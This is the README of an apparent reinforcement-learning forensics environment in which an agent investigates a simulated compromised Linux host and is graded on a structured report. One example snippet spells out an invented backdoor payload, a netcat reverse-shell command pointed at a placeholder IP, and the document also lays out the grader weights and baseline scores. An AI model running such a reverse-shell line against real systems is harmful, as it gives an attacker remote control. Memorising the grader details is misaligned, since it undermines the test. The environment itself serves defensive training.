---
title: ForensicShell OpenEnv
emoji: π
colorFrom: red
colorTo: gray
sdk: docker
pinned: false
app_port: 8000
base_path: /web
tags:
  - openenv
  - forensics
  - security
  - rl
---
# ForensicShell – OpenEnv Environment

A real-world digital forensics environment for the OpenEnv RL framework. The agent
investigates a pre-seeded "breached" Linux host using read-only structured actions
(`list_dir`, `read_file`, `grep`, `stat`) and submits a structured `ForensicReport`
that is graded deterministically against hidden ground truth.
## Why this environment?

Most RL environments are toys (games, classification, echo). ForensicShell simulates something a junior SOC analyst actually does on day one: SSH into a compromised box, read the logs, find the modified files, hash the backdoor, and reconstruct the attacker's kill chain. It is not a game: the grader is fully deterministic, and partial credit is awarded per subfield, so the reward function gives a real gradient instead of a 0/1 cliff.
## Tasks

The environment exposes three difficulty tiers, selectable at `reset(task_id=...)`.

| `task_id` | Difficulty | What the agent must determine |
|---|---|---|
| `t1_login` | Easy | Compromised user + initial source IP |
| `t2_modified` | Medium | + List of modified system files + SHA256 of the backdoor binary |
| `t3_timeline` | Hard | + Ordered attacker kill-chain timeline (login → recon → privesc → persistence → exfil) |

Each task ships with a different hand-authored scenario: different usernames, IPs, attacker tools, and attack patterns. Ground truth is held inside the env and never exposed to the agent through the action API.
## Action space

A single discriminated action `ForensicShellAction`, with `action_type` selecting the verb:

| `action_type` | Required fields | Effect |
|---|---|---|
| `list_dir` | `path` | List immediate children of a directory in the synthetic FS |
| `read_file` | `path`, `max_bytes` | Read the contents of a file (truncated to `max_bytes`) |
| `grep` | `pattern`, `path` | Return matching lines with line numbers (max 100 hits) |
| `stat` | `path` | Return size + SHA256 of the file's bytes |
| `submit_report` | `report` (`ForensicReport`) | Terminal – grades the report and ends the episode |

The agent has 30 steps per episode. Failing to submit before the budget is exhausted ends the episode with reward 0.
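Since `stat` reports the SHA256 of a file's raw bytes, a hash for the report can be cross-checked with a plain `hashlib` digest. A minimal illustration, assuming `stat` returns a hex digest (the payload below is invented for the example):

```python
import hashlib

def sha256_hex(data: bytes) -> str:
    """Hex SHA256 digest of raw bytes, in the style of the stat verb's file hash."""
    return hashlib.sha256(data).hexdigest()

# Invented backdoor payload, purely for illustration.
payload = b"#!/bin/sh\n/bin/nc -e /bin/sh 198.51.100.77 4444\n"
print(sha256_hex(payload))
```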
## Observation space

```python
class ForensicShellObservation(Observation):
    output: str                   # human-readable result of the last action
    task_id: str                  # current task identifier
    task_description: str         # what the agent must determine
    steps_remaining: int          # remaining action budget
    action_error: Optional[str]   # error message if the last action failed, else None
    done: bool
    reward: float                 # 0.0 except on the terminal submit_report step
    metadata: dict
```
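Because timing out scores 0 while a partial report still earns partial credit, a client loop should watch `steps_remaining` and submit before the budget runs out. A minimal decision helper, where `Obs` is an illustrative stand-in for the observation class:

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class Obs:
    """Stand-in for ForensicShellObservation, with just the fields we need."""
    steps_remaining: int
    action_error: Optional[str] = None

def should_submit(obs: Obs, report_ready: bool) -> bool:
    """Submit once the report is complete, or when only one step remains,
    since a partial report beats the reward-0 timeout."""
    return report_ready or obs.steps_remaining <= 1
```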
## Reward function

Rewards are returned only on the terminal `submit_report` step. The grader is
deterministic and awards partial credit per subfield, so the reward signal has
a meaningful gradient:

| Task | Grader composition |
|---|---|
| `t1_login` | `0.5*user_correct + 0.5*ip_correct` |
| `t2_modified` | `0.2*user + 0.2*ip + 0.3*Jaccard(modified_files) + 0.3*sha256_correct` |
| `t3_timeline` | `0.15*user + 0.15*ip + 0.15*files + 0.15*sha + 0.20*phase_F1 + 0.20*Kendall_tau_ordering` |

All rewards clip to [0.0, 1.0]. See `server/grader.py` for the full implementation.
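The `t2_modified` composition can be sketched as follows. This is a simplified reimplementation for intuition, not the actual `server/grader.py`; field and helper names here are illustrative:

```python
def jaccard(a: set, b: set) -> float:
    """Set-overlap score in [0, 1]; defined as 1.0 when both sets are empty."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)

def grade_t2(report: dict, truth: dict) -> float:
    """Weighted partial credit for t2_modified, matching the table above."""
    score = (
        0.2 * (report["user"] == truth["user"])
        + 0.2 * (report["ip"] == truth["ip"])
        + 0.3 * jaccard(set(report["modified_files"]), set(truth["modified_files"]))
        + 0.3 * (report["sha256"] == truth["sha256"])
    )
    return max(0.0, min(1.0, score))  # clip to [0, 1]
```

Note how a half-right file list still earns 0.15 of the 0.3 file weight, which is what gives the reward its gradient.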
## Quick start (client)

```python
import asyncio

from forensic_shell import ForensicShellAction, ForensicShellEnv
from forensic_shell.models import ForensicReport, TimelineEvent

async def main():
    async with ForensicShellEnv(base_url="https://YOUR-SPACE.hf.space") as env:
        result = await env.reset(task_id="t1_login")
        print(result.observation.task_description)

        result = await env.step(ForensicShellAction(action_type="list_dir", path="/var/log"))
        result = await env.step(ForensicShellAction(action_type="read_file", path="/var/log/auth.log"))

        result = await env.step(ForensicShellAction(
            action_type="submit_report",
            report=ForensicReport(compromised_user="alice", initial_ip="198.51.100.77"),
        ))
        print(f"reward={result.reward:.3f} done={result.done}")

asyncio.run(main())
```
## Building locally

```shell
docker build -t forensic-shell:latest -f server/Dockerfile .
docker run -p 8000:8000 forensic-shell:latest
```

The server exposes:

- `POST /reset` – start a new episode
- `POST /step` – execute an action
- `GET /state` – episode state
- `GET /health` – health check
- `GET /docs` – OpenAPI docs
- `WS /ws` – persistent WebSocket session (used by `EnvClient`)
## Running the baseline

The repo root contains `inference.py`, which runs an OpenAI-client-compatible LLM
through all three tasks and emits hackathon-formatted `[START]`/`[STEP]`/`[END]` log
lines to stdout.

```shell
export HF_TOKEN=<your-key>
export API_BASE_URL=https://api.groq.com/openai/v1   # or HF Router
export MODEL_NAME=llama-3.3-70b-versatile
export LOCAL_IMAGE_NAME=forensic-shell:latest
python inference.py
```
A local baseline run (Llama-3.3-70B via Groq) scores roughly:

| Task | Score |
|---|---|
| `t1_login` (easy) | 1.000 |
| `t2_modified` (medium) | 0.500 |
| `t3_timeline` (hard) | 0.750 |

Scores are non-trivial without the tasks being trivially solved – exactly what an RL training signal needs.
## License

BSD-3-Clause (matches OpenEnv core).